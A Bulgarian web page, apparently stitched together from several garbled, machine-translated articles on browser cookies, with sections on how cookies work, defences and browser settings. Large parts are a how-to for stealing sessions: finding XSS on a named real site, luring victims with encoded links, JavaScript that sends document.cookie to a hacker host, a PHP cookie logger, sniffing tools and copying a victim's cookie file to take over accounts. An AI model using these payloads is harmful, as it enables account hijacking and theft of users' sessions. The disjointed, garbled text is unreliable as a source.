Приятелят ми забрави паролата за един сайт. Преди това обаче той постави отметка в квадратчето „Запомни ме“ по време на влизане. Google браузър Chrome, което му позволи да влезе в сайта под своя акаунт. Попитаха ме дали това магическо състояние може да се прехвърли на друг компютър. Би било по-правилно, разбира се, да промените или възстановите паролата, но познатият не може да направи това по причини, които не са свързани със случая.

Как да използвате intercepter-ng за манекени

Въпреки разнообразието от избор на модерен софтуер, е трудно да се намерят програми за хакване за android, по-добри от intercepter ng. Първият критерий в полза на този продукт е действителната му производителност. Повечето от предложените снифери в мрежата са само имитация, която не изпълнява декларираните функции.

Следващите положителни фактори са гъвкавостта на приложението и покритието на широка аудитория от потребители.

Компютърна помощ 939-29-71

Да започнем по ред. Бисквитките или „бисквитките“ са много малки текстови файлове – отметки с информация.

Уеб сървърът изпраща тази информация до браузъра на потребителя. където тази информация се съхранява, докато не е необходима. Не съвсем ясно. Добре. ДОБРЕ.

Ще се опитам да го направя още по-лесно. Вижте. сте се регистрирали в някой сайт.

По време на регистрацията се създават именно тези „бисквитки“.

Ето ги и тях.

Cookie Cadger

Програмата слуша трафика в WiFi мрежата, прихваща бисквитките и репликира сесията на потребителя във вашия браузър, повтаряйки заявки с неговите идентификационни данни. Авторът Матю Съливан направи презентация на програмата на 30 септември на хакерската конференция Derbycon. Точно по време на речта Матю Съливан прихвана незащитена сесия с Google на един от присъстващите на конференцията чрез WiFi.

Как се крадат бисквитки

Ако, докато сте на страницата на сайта, влезете в адресна лента Браузър Firefoxили Opera следния текст: javascript:document.write(document.cookie); ще видите нещо като: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; описание на ремикса=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Внимание! .

Пълното ръководство за междусайтови скриптове

XSS е вид уязвимост софтуер, вграден в уеб приложенията, който позволява на атакуващия да инжектира скрипт от страна на клиента в уеб страници, гледани от други потребители. Wikipedia има следната дефиниция за XSS: „Междусайтовият скрипт (XSS) е вид софтуерна уязвимост, присъща на уеб приложенията (от заобикаляне на ограниченията за сигурност на браузъра)", което позволява на хакер да инжектира клиентски скрипт в уеб страници, гледани от други потребители.

Разлика между бисквитки и сесии

Не толкова отдавна написах статия за това как да регистрирате и упълномощавате потребители на сайта.

". В тази статия ще разбия разликата между сесии и бисквитки. за да направите окончателния си избор.

Бисквитки. Не, не става въпрос за бисквитки, а за вашата безопасност. Така че отивате на любимия си сайт "vkontakte" (или, например, разглеждате пощата) на компютъра на някой друг, отказвате опцията "запазване на паролата", щастливо разглеждате пощата и си тръгвате. И не мислете за факта, че под вашето име вече можете да отидете социална мрежаили поща.

Дори не обмислям ситуацията с програма, която помни парола, без да я знаете. Това вече е умишлен хак и вероятно ще се усъмните, че може да се случи нещо подобно и няма да отидете на любимия си сайт на такъв компютър. Но можем да говорим за просто човешко любопитство - бяхме на гости при приятели и след това веднъж, и те получават възможност да четат вашата поща. Сигурни ли сте, че ще откажат такава възможност? Не те ли е страх, че ще изникне нещо? Във всеки случай ще оставя настрана проблемите с морала и просто ще говоря за това как се съхранява информацията на компютъра, че сега можете да бъдете допуснати до някой сайт, без да искате парола.

как се крадат бисквитки

И името на тази технология е бисквитки.

И оттук започна всичко. Протоколът http, по който всъщност разглеждате сайтове (включително този), първоначално не предполагаше възможност за поддържане на връзка. Тоест, грубо казано, изпращате заявка до сайта, получавате отговор, той се показва на екрана и след това сървърът не помни нищо за вас. Разбира се, това е добре, когато сайтът е чисто информационен и не трябва да помни нищо за вас, но живеем в епохата на Web 2.0 😉 Естественото развитие на протокола е POST и GET заявки, когато изпращате някакви данни, сървърът може запишете ги в данните от базата данни, но това не е достатъчно.

Нека да разгледаме един много прост пример. Форум. Значи сте се регистрирали и във форума има запис, че има такъв и такъв потребител с такава и такава парола и някакви други допълнителни данни. Но сега влизате във форума и влизате - въвеждате паролата си. Някъде трябва да има информация, че сте влезли. На сървър? Разбира се, че не! Невъзможно е да запазите информация на сървъра, че оторизацията е направена от вашия компютър - той няма да може да ви различи от някой друг (дори вашият IP адрес не ви идентифицира уникално)! По този начин информацията, че е настъпило разрешение, трябва да се съхранява на вашия компютър. За това са бисквитките, за това са създадени.

Бисквитката е малък запис на вашия компютър, който съхранява информация за сайта, който сте посетили. При оторизация се създава подобен запис, след което вече можете да се разхождате из форума и той ще ви разпознае. Това обаче вече ще се случи автоматично - благодарение на информацията, съхранена в бисквитката - така че преструването, че сте главният администратор на форума, все още няма да работи, заобикаляйки проверката на паролата.

Сега можем да се върнем там, откъдето започна тази статия. Ако сте влезли някъде, без дори да запазите паролата си, тогава може да се случи, че на компютъра е създаден запис, който сега ви позволява да влизате в този ресурс под вашето име без разрешение. Самият такъв запис ще стане остарял след известно време, но можете да го изчистите принудително. Всеки браузър прави това по различен начин, ще ви покажа как да го направите в моя любим Google Chrome. Отваряне на опциите

Отидете в раздела „разширени“ и намерете бутона „покажи бисквитките“.

Сега, разбира се, можете да изтриете всички бисквитки, но това може да разстрои собственика на компютъра. Ето защо, например, в горното поле можете да въведете името на сайта, който ви интересува

Тогава само бисквитките, свързани с този сайт, могат да бъдат изчистени. Можете да опитате моите. Освен това, ако влезете в моя форум и след това изчистите вашите бисквитки, тогава информацията за оторизация ще бъде забравена. Опитай!

коментари, предоставени от

1. Какво е XSS
Уязвимост тип XSS позволява вмъкване на произволен javascript код в тялото на страница. XSS атакасе различава от другите (напр. SQL инжектиране или PHP инжектиране) по това, че действа не на сървъра, а на клиента.

как се крадат бисквитки

С негова помощ не можете да преглеждате таблици на база данни, да качвате shell и т.н. Най-честата употреба на XSS е за кражба на бисквитки.
Бисквитки (Cookies) - малка част от данните, създадени от уеб сървър и съхранявани на компютъра на потребителя като файл. Обикновено бисквитките се използват за съхраняване на акаунти и най-често съдържат кодирана парола, потребителско име и идентификатор на сесия. (Въпреки че не винаги)
XSS са два вида, активни и пасивни.

Пасивен XSSизискват от жертвата да участва директно, например да последва връзка, съдържаща javascript код. Когато използвате този тип XSS, не можете без SI (социално инженерство)

Активен XSSне изискват никакво участие от жертвата, тя просто трябва да отиде на страницата с XSS. Активен XSS може да бъде например във форумни публикации, чатове, при добавяне на новини и т.н.

2. Търсете XSS
В този параграф ще ви кажа как да намерите xss

2.1 Пасивен XSS
За да намерите пасивен XSS, просто заменете във формата за въвежданеако скриптът работи и се появи съобщението "xss", значи уязвимостта е налице, ако скриптът не работи, все още можете да опитате ">, това е може би най-често срещаната xss уязвимост. Ако нито единият, нито другият скрипт не са работили, тогава най-вероятно няма уязвимост.
Нека разгледаме един пример.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Виждате ли формата за търсене? поставете там ">и щракнете върху "намери"
Прозорец с xss излетя, което означава, че xss е налице. (Може би по времето, когато четете тази статия, този xss вече ще бъде коригиран)

2.2 Активен XSS
Такъв CSS може да бъде например в полетата на профила, при добавяне на новини в името на новините и в самите новини (по-рядко), в съобщения във форуми / чатове / книги за гости с активиран html. Тук всичко е просто, въвеждаме скрипта от предишния параграф в полетата и ако съобщението се показва на екрана, тогава уязвимостта е налице.
Помислете за xss в BB таговете във форумите.
можете да опитате глупаво да вмъкнете javascript код в маркера, като този:
javascript: предупреждение ('xss')
Някои тагове имат параметри, например тагът има параметри dynsrc и lowsrc, нека се опитаме да заменим кода така:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Ако скриптът работи, xss е

3. Използване на XSS за кражба на бисквитки
Сега най-вкусното
За да крадем бисквитки, имаме нужда от уеб снифър, можете да инсталирате някакъв снифър на вашия хостинг или можете да използвате онлайн снифър, които вече са пълни.
За да открадне бисквитки чрез пасивен XSS, жертвата трябва да следва отровна връзка. За кражба на бисквитки ще използваме вместо товадруг скрипт:
заместваме скрипта във връзката и оставяме жертвата да го следва, вижте дневника на снифъра и се зарадвайте.
Нека разгледаме един пример.
Нека вземем този XSS на rambler от предишния параграф.
Залепете
">
във формата за търсене щракнете върху „намери“, погледнете адресната лента и вижте:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Хвърляме тази връзка на жертвата и се наслаждаваме на бисквитките.
Виждайки такава връзка, жертвата може да подозира нещо, така че е препоръчително да се кодира
">
в URL Или използвайте услуги като http://tinyurl.com/
Нека да преминем към активен XSS, тук всичко е просто, вместо alert() вмъкваме img = new Image(); img.src = "адрес на снифър изображение"+document.cookie;

Сега имаме бисквитки. Но какво да правим с тях? Това е просто, те трябва да бъдат заменени вместо техните собствени. AT Браузър Operaима вграден редактор на бисквитки (инструменти->разширени->управление на бисквитки), има плъгин за firefox (не помня името, използвайте google)
Това е всичко засега, може би статията ще бъде допълнена

На въпроса Как да получите БИСКВИТКИ бисквитки. Имате нужда от бисквитки, как да ги получа, моля, кажете ми!!! 1 комплект от автора Влад еееееееееееееееенай-добрият отговор е Какво представляват бисквитките?
Факт е, че в процеса на развитие на www-технологиите и въвеждането на езици за програмиране в Интернет пред разработчиците на програми възникна много сериозен проблем - как да запазят резултатите от изпълнението на алгоритъма за всеки конкретен потребител на за дълго време? Сам по себе си HTTP протоколът няма способността да улавя резултатите от софтуерните процеси. Използването на сесии също не е решение на проблема, тъй като тяхното действие се прекратява веднага след прекъсване на връзката със сървъра.
Проблемът беше разрешен с въвеждането на механизма за бисквитки (т.е. в превод от английски „бисквитки“). Бисквитките имат едно забележително свойство - те се съхраняват на твърдия диск на потребителя и могат да се съхраняват там почти неограничено време.
По своята същност бисквитките са обикновени текстови файлове, съхранявани в специална директория, използвана от браузъра (обикновено наричана Временни интернет файлове), и можете да ги видите, като отидете в тази директория ( бърз достъпкъм него за браузъра IE се осъществява чрез елементите от менюто Инструменти -> Интернет опции -> Временни интернет файлове -> Настройки -> Изглед
Някои бисквитки могат да се съхраняват само за една сесия, те се изтриват след затваряне на браузъра. Други, зададени за определен период от време, се записват във файл. По принцип този файл се нарича "cookies.txt" (но може да има няколко) и се намира в работната директория на браузъра, инсталиран на компютъра.
с други думи
Бисквитката е малка част от текстова информация, която сървърът изпраща на браузъра. Сами по себе си бисквитките не могат да направят нищо, но когато потребител влезе в сървъра (напише адреса си в реда на браузъра), сървърът може да прочете информацията, съдържаща се в бисквитките, и въз основа на своя анализ да извърши всякакви действия. Например, в случай на оторизиран достъп до нещо чрез мрежата, потребителското име и паролата се съхраняват в бисквитки по време на сесията, което позволява на потребителя да не ги въвежда отново, когато иска всеки защитен с парола документ.
Ако се опитвате да получите достъп чрез тази тема до нечии акаунти, защитени с парола, тогава трябва да намерите начин дистанционно (троян) или чрез нагло копиране на флашка, ако имате достъп до компютъра, на който работи жертвата, копирайте този файл cookie.txt и го заменете във вашия (същия) браузър върху него. След това отивате на желания сайт, където акаунтът ви интересува, и автоматично получавате достъп. Но имайте предвид, че ако жертвата натисне изхода от акаунта (например от пощата) в края на работата, тогава информацията за сесията ще бъде изтрита в бисквитките и няма да получите достъп.
Mozilla Firefox съхранява бисквитки в потребителския профил, във файла C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
nternet explorer запазва тези бисквитки като отделни текстови файлове в папката C:Documents and SettingsUsernameCookies
Opera съхранява бисквитки във файла C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Бисквитки - информация под формата на текстов файл, съхранявана на компютъра на потребителя от уебсайта. Съдържа данни за удостоверяване (вход/парола, ID, телефонен номер, адрес пощенска кутия), потребителски настройки, състояние на достъп. Съхранява се в профила на браузъра.

Хак за бисквитки е кражба (или "отвличане") на сесия на посетител на уеб ресурс. Секретната информация става достъпна не само за подателя и получателя, но и за трето лице - лицето, което е прихванало.

Инструменти и техники за хакване на бисквитки

Компютърните крадци, подобно на колегите си в реалния живот, освен умения, сръчност и познания, разбира се, имат и собствени инструменти – своеобразен арсенал от мастер ключове и сонди. Нека се запознаем с най-популярните трикове на хакерите, които използват, за да измъкнат бисквитки от обитателите на Интернет.

Снифери

Специални програмиза наблюдение и анализ на мрежовия трафик. Името им идва от английския глагол "sniff" (подуши), т.к. буквално "надушват" предаваните пакети между възлите.

Но нападателите използват снифър за прихващане на данни от сесии, съобщения и други конфиденциална информация. Обект на техните атаки са предимно несигурни мрежи, където бисквитките се изпращат в отворена HTTP сесия, тоест практически не са криптирани. (Общественият Wi-Fi е най-уязвим.)

Следните методи се използват за инжектиране на снифър в интернет канала между хоста на потребителя и уеб сървъра:

  • "слушане" на мрежови интерфейси (хъбове, комутатори);
  • разклоняване и копиране на трафик;
  • връзка с прекъсването на мрежовия канал;
  • анализ чрез специални атаки, които пренасочват трафика на жертвата към снифър (MAC-spoofing, IP-spoofing).

Съкращението XSS означава Cross Site Scripting. Използва се за атака на уебсайтове с цел кражба на потребителски данни.

Начинът, по който работи XSS, е следният:

  • нападател инжектира злонамерен код (специален маскиран скрипт) в уеб страница на уебсайт, форум или в съобщение (например при чат в социална мрежа);
  • жертвата посещава заразената страница и се активира задайте кодна вашия компютър (щрака, следва връзка и т.н.);
  • на свой ред, активираният злонамерен код "извлича" поверителни данни на потребителя от браузъра (по-специално бисквитки) и ги изпраща до уеб сървъра на атакуващия.

За да „имплантират“ софтуерен XSS механизъм, хакерите използват всякакви уязвимости в уеб сървъри, онлайн услуги и браузъри.

Всички XSS уязвимости са разделени на два типа:

  • Пасивен. Атаката се получава чрез запитване до специфичен скрипт на уеб страница. Злонамерен кодмогат да бъдат въведени в различни форми на уеб страница (например в лента за търсене на сайт). Най-податливи на пасивен XSS са ресурсите, които не филтрират HTML таговете при пристигането на данни;
  • Активен. Намира се директно на сървъра. И те се активират в браузъра на жертвата. Те се използват активно от измамници в различни блогове, чатове и емисии с новини.

Хакерите внимателно "камуфлират" своите XSS скриптове, така че жертвата да не заподозре нищо. Те променят разширението на файла, предават кода като изображение, мотивират ги да последват връзката, привличат ги с интересно съдържание. В резултат на това: потребител на компютър, който не се е справил със собственото си любопитство, със собствената си ръка (с щракване на мишката) изпраща сесийни бисквитки (с вход и парола!) На автора на XSS скрипта - компютърен злодей.

Подправяне на бисквитки

Всички бисквитки се съхраняват и изпращат към уеб сървъра (от който са "дошли") без никакви промени - в оригиналния си вид - със същите стойности, низове и други данни. Умишлената промяна на техните параметри се нарича подправяне на бисквитки. С други думи, когато една бисквитка е фалшифицирана, нападателят си пожелава. Например, когато извършвате плащане в онлайн магазин, сумата на плащането се променя в бисквитката на по-малка страна - по този начин има „спестявания“ при покупки.

Откраднатите сесийни бисквитки в социална мрежа от нечий друг акаунт се „вмъкват“ в друга сесия и на друг компютър. Собственикът на откраднатите бисквитки получава пълен достъпкъм акаунта на жертвата (кореспонденция, съдържание, настройки на страницата), докато тя е на своята страница.

„Редактирането“ на бисквитките се извършва чрез:

  • функции "Управление на бисквитки ..." в браузъра Opera;
  • добавки Cookies Manager и Advanced Cookie Manager за FireFox;
  • IECookiesView помощни програми (само за Internet Explorer);
  • текстов редакторкато AkelPad, NotePad или Windows notepad.

Физически достъп до данни

Силно проста схемаизпълнението се състои от няколко стъпки. Но е ефективен само ако компютърът на жертвата с открита сесия, например Vkontakte, остава без надзор (и то за доста дълго време!):

  1. Въведете в адресната лента на браузъра javascript функция, който показва всички запазени бисквитки.
  2. След натискане на "ENTER" всички те се появяват на страницата.
  3. Бисквитките се копират, записват във файл и след това се прехвърлят на флаш устройство.
  4. На друг компютър бисквитките се заменят в нова сесия.
  5. Отваря се достъп до акаунта на жертвата.

По правило хакерите използват горните инструменти (+ други) както в комбинация (тъй като нивото на защита на много уеб ресурси е доста високо), така и отделно (когато потребителите са прекалено наивни).

XSS + снифер

  1. Създава се XSS скрипт, който посочва адреса на онлайн снифъра (собствено производство или конкретна услуга).
  2. Зловреден код се записва с разширение .img (картинен формат).
  3. След това този файл се качва на страницата на сайта, чата или личното съобщение - където ще бъде извършена атаката.
  4. Вниманието на потребителя се насочва към създадения „капан“ (тук влиза в действие социалното инженерство).
  5. Ако „капанът“ работи, бисквитките от браузъра на жертвата се прихващат от снифъра.
  6. Кракерът отваря регистрационните файлове на снифъра и извлича откраднатите бисквитки.
  7. След това извършва заместване, за да получи правата на собственика на акаунта, като използва горните инструменти.

Защита на бисквитките от хакване

  1. Използвайте криптирана връзка (като използвате подходящи протоколи и методи за сигурност).
  2. Не отговаряйте на съмнителни линкове, снимки, примамливи предложения да се запознаете с „новия безплатен софтуер“. Особено от непознати.
  3. Използвайте само надеждни уеб ресурси.
  4. Прекратете разрешена сесия, като натиснете бутона "Изход" (а не просто затворете раздела!). Особено ако акаунтът не е влязъл с персонален компютър, но например от компютър в интернет кафе.
  5. Не използвайте функцията "Запазване на паролата" на вашия браузър. Съхранените регистрационни данни увеличават в пъти риска от кражба. Не бъдете мързеливи, не отделяйте няколко минути време, за да въведете парола и да влезете в началото на всяка сесия.
  6. След сърфиране в мрежата – посещение на социални мрежи, форуми, чатове, сайтове – изтрийте запазените бисквитки и изчистете кеша на браузъра.
  7. Редовно актуализирайте браузърите и антивирусния софтуер.
  8. Използвайте разширения на браузъра, които предпазват от XSS атаки (например NoScript за FF и Google Chrome).
  9. Периодично в сметките.

И най-важното - не губете бдителност и внимание, докато си почивате или работите в Интернет!

Какво е бисквитка?

Има механизъм, който позволява на http сървъра да съхранява на компютъра на потребителя някои текстова информацияи след това се свържете с нея. Тази информациянаречена бисквитка. Всъщност всяка бисквитка е двойка: името на параметъра и неговата стойност. На всяка бисквитка също се присвоява домейнът, към който принадлежи. От съображения за сигурност във всички браузъри http сървърът има достъп само до собствената си бисквитка на домейна. Освен това бисквитките могат да имат дата на изтичане, в който случай те ще се съхраняват на компютъра до тази дата, дори ако всички прозорци на браузъра са затворени.


Защо бисквитките са важни?

Във всички многопотребителски системи бисквитките се използват за идентифициране на потребителя. Или по-скоро текущата връзка на потребителя с услугата, потребителската сесия. Ако някой разпознае вашите бисквитки, той може да влезе от ваше име. Защото в този моментмного малко интернет ресурси проверяват промяната на IP адреса по време на една потребителска сесия.


Как да промените или промените бисквитките?

Разработчиците на браузъри не предоставят вградени инструменти за редактиране на бисквитки. Но можете да се справите с обикновен бележник (бележник).


Стъпка 1: създайте текстов файлс текст

Windows Редактор на регистъраВерсия 5.00



@="C:\\IE_ext.htm"

Записваме го под името IE_ext.reg

Стъпка 2: Използвайки създадения файл, добавете промени в системния регистър на Windows.

Стъпка 3: създайте текстов файл с текст

< script език="javascript">
external.menuArguments.clipboardData.setData("Текст" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
предупреждение (external.menuArguments.document.cookie);


Запазете го като C:\IE_ext.htm

Стъпка 4: Отиваме на уебсайта, който ни интересува.

Стъпка 5: Кликнете с десния бутонкликвания на мишката върху свободно пространствостраница и изберете елемента от менюто „Работа с бисквитки“. Разрешете достъп до клипборда. Вашите бисквитки за този сайт ще бъдат поставени в клипборда. Можете да залепите техния тефтер (бележник) и да видите.


Стъпка 6: За да промените някои бисквитки, редактирайте файла C:\IE_ext.htm, като замените тестово имев името на бисквитката, тестова стойност- по значението му, testdomain.com- към домейна на уебсайта. Добавете още редове като този, ако е необходимо. За удобство на контрола добавих изхода на текущите бисквитки към скрипта преди и след промяната: предупреждение (external.menuArguments.document.cookie);

Стъпка 7: Стартирайте стъпка 5 отново и след това опреснете страницата.

В крайна сметка: ще отидем на този интернет ресурс с актуализирани бисквитки.

Как да крадем бисквитки с JavaScript?

Ако нападателят е успял да намери възможност да изпълни произволен JavaScript скрипт на компютъра на жертвата, прочетете текущи бисквиткитой може много лесно. Пример:


varstr=document.cookie;

Но ще успее ли да ги прехвърли на своя сайт, защото, както посочих по-рано, JavaScript скрипт не може допълнително потвърждениедостъп до сайт, намиращ се в друг домейн? Оказва се, че JavaScript скрипт може да зареди всяко изображение, намиращо се на всеки http сървър. В същото време прехвърлете всякаква текстова информация в заявката за изтегляне към тази снимка. Пример: http://hackersite.ru/xss.jpg?text_infoТака че, ако стартирате този код:

varimg= нова картинка();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


тогава бисквитките ще бъдат в заявката за изтегляне на „картинката“ и „оставяне“ на нападателя.

Как да обработваме такива заявки за качване на "снимка"?

Нападателят трябва само да намери хостинг с php поддръжкаи поставете код като този:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

След това всички параметри на заявката към този скрипт ще бъдат запазени във файла log.txt. Остава само в предварително описания JavaScript скрипт да се замени http://hackersite.ru/xss.jpgкъм пътя до този php скрипт.


Резултат

Показах само най-простия начин за използване на XSS уязвимости. Но това доказва, че наличието на поне една такава уязвимост на многопотребителски интернет сайт може да позволи на атакуващ да използва неговите ресурси от ваше име.

Opera отворете главното меню, отидете в секцията „Настройки“ и изберете реда „ Основни настройки...". И можете просто да натиснете горещо Клавиши CTRL+ F12. Това ще отвори прозореца с настройки на браузъра, където в раздела „Разширени“ трябва да кликнете върху секцията „Бисквитки“ в левия панел. В него трябва да кликнете върху бутона „Управление на бисквитките“.

AT Mozilla Firefoxотворете секцията "Инструменти" в менюто и изберете елемента "Настройки". В прозореца с настройки трябва да отидете в раздела „Поверителност“, да намерите там бутона „Покажи бисквитките ...“ и да щракнете върху него, за да получите достъп до списъка с бисквитки, съхранявани от браузъра. Тук могат да се търсят и разглеждат.

В Internet Explorer разгънете секцията „Инструменти“ в менюто и изберете „Свойства“. В прозореца за настройки на свойства отидете в раздела Общи и щракнете върху бутона Опции в раздела Хронология на сърфирането. По този начин ще отворите друг прозорец (“Опции за временни файлове”), в който трябва да щракнете върху бутона “Показване на файлове”.

Щракнете върху заглавието „Име“ в списъка със съдържание на папката с временни файлове на Internet Explorer, която се отваря - по този начин можете да групирате всички бисквитки в един блок в обща купчина разнородни файлове. Тук можете да намерите файла, който ви интересува, и да го отворите в стандартен Notepad за преглед или редактиране.

В Google Chrome щракнете върху иконата на гаечен ключ в горния десен ъгъл на прозореца и изберете Опции от менюто. Браузърът ще отвори страницата „Настройки“ и вие щракнете върху връзката „Разширени“ в левия панел и на страницата с разширени настройки щракнете върху бутона „Настройки на съдържанието“. Все още не е последната страницапо пътя към бисквитките, съхранявани от този браузър.

Щракнете върху бутона „Всички бисквитки и данни за сайтове“ на следващата страница и най-накрая ще имате достъп до списъка с бисквитки.

Google Chrome предоставя възможност за търсене, преглед и изтриване на бисквитки.

В браузъра Safari щракнете върху иконата на зъбно колело вдясно горен ъгъли изберете реда "Настройки ...". В прозореца за промяна на настройките трябва да отидете в раздела "Сигурност", за да кликнете върху бутона "Покажи бисквитките" там. Safari предоставя само функции за търсене и изтриване на бисквитки, съдържанието на тези временни файлове може да се види само частично тук.